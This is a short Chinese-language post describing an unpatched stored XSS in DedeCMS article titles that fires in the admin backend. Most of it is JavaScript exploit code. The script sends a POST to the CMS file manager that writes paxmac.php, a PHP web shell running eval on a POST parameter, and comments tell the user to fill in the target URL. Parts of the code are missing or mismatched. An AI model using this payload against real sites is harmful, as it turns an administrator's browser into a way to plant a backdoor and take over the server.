dedecms的漏洞很多,但是厂商都是不做修复。
之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。
后台可触发xss
利用js代码
| 02 | if(window.XMLHttpRequest) { |
| 03 | request = new XMLHttpRequest(); |
| 04 | if(request.overrideMimeType) { |
| 05 | request.overrideMimeType('text/xml'); |
| 07 | } else if(window.ActiveXObject) { |
| 08 | var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; |
| 09 | for(var i=0; i<versions.length; i++) { |
| 11 | request = new ActiveXObject(versions[i]); |
| 20 | var postStr="fmdo=edit&backurl=& activepath=%2Fdedecmsfullnew%2Fuploads%2Fuploads& filename=paxmac.php&str=%3C%3Fphp+eval%28%24_POST%5B%27cmd%27%5D%29 %3B%3F%3E&B1=++%B1%A3+%B4%E6++";//url需要自己修改 |
| 22 | xmlhttp.open("POST", "", true);//url需要自己修改 |
| 23 | xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); |
| 24 | xmlhttp.setRequestHeader("Content-length", postStr.length); |
| 25 | xmlhttp.setRequestHeader("Connection", "close"); |
| 26 | xmlhttp.send(postStr); |
触发前
触发后